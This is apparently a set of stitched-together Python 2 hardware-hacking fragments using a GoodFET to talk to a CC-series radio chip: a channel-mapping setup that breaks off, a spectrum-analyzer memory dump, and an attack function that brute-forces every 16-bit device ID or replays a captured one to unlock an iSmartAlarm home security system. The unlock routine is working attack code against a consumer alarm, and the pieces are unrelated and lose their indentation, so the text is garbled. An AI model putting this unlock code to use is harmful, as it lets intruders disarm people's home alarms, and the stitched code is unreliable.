from GoodFETCC import GoodFETCC from intelhex import IntelHex16bit, IntelHex import time # Sleep Intervals in Seconds sshsi = 1 # one second shsi = 10 # 10 seconds mdsi = 60 # 1 minute lgsi = 120 # 2 minutes xlgsi = 1200 # 20 minutes client = GoodFETCC() client.serInit() client.setup() client.start() # Start and stop if previously something failed client.CChaltcpu() client.CCreleasecpu() # Map channel number to approximate frequency # 0 == 902 thru 52 == 928 with a step of .5 MHz max_chan = 53 # however 0 IS included, so 53 chan_dict = dict([(x, ((x * .5) + 902)) for x in range(max_chan)]) #bytestart=0xf000; chan_data_start = 0xF000 # 53 chans x 6 bytes chan_min_start = 0xF13E # 53 chans x 1 byte chan_chg_start = 0xF173 # 3500 bytes
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.
import sys;
sys.path.append('/Users/travis/svn/goodfet/trunk/client/')
from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;
import time;
client=GoodFETCC();
client.serInit();
client.setup();
client.start();
bytescount=8*132;
bytestart=0xf000;
while 1:
time.sleep(1);
client.CChaltcpu();
dump="";
for foo in range(0,bytescount):
dump=("%s %02x" % (dump,client.CCpeekdatabyte(bytestart+foo)));
if foo%8==7: dump=dump+"\n";
print dump;
sys.stdout.flush();
client.CCreleasecpu();
def attack(attack_type):
try:
global ser
global args
byte = '1'
#Initialize GoodFET serial port connection
client = GoodFETCC()
client.serInit()
# Connect to GoodFET
client.setup()
# Initialize GoodFET client multiple times, this is due to poor JTAG latching
client.start()
client.start()
client.start()
client.start()
# Open serial pipe to Arduino
ser = serial.Serial(args.port, 9600, timeout=0)
if attack_type == '0':
clearscreen()
id = 'FFFFFFFFFFFFFF0000000000070000FF'
bytes = bytearray.fromhex(id)
counter = 0 #38520
while True:
if counter == 65535:
break
counter += 1
bytes[13:15] = unhexlify(offset(counter))
f = StringIO(data(32752, bytes) + '\n:00000001FF')
print pink("IHEX:\n" + f.getvalue() + '\n')
client.flash(f)
f.close()
client.stop()
sleep(2.5)
serialpoke(byte)
sleep(0.6)
client.start()
print green(
"[SUCCESS] All 65536 ID's have been exhausted, good day.")
exit_clean()
else:
global src_id
print green(
"[SUCCESS] Source ID captured from iSmartAlarm remote or sensor, attempting unlock...\n"
)
id = 'FFFFFFFFFFFFFF00000000' + src_id + 'FF'
bytes = bytearray.fromhex(id)
if attack_type == '2':
raw_input('Press [ENTER] when ready to unlock:')
else:
print yellowbold(
"[INFO] Delay mode enabled. Waiting %i seconds till unlock"
% args.delay)
sleep(args.delay)
f = StringIO(data(32752, bytes) + '\n:00000001FF')
print pink("IHEX:\n" + f.getvalue() + '\n')
client.flash(f)
f.close()
client.stop()
sleep(2.5)
serialpoke(byte)
sleep(0.6)
print green("[SUCCESS] Hopefully unlocked :D")
exit_clean()
except Exception, e:
print red("\n[ERROR] An error occured while flashing ID's\n\t%s" % e)
exit_clean()
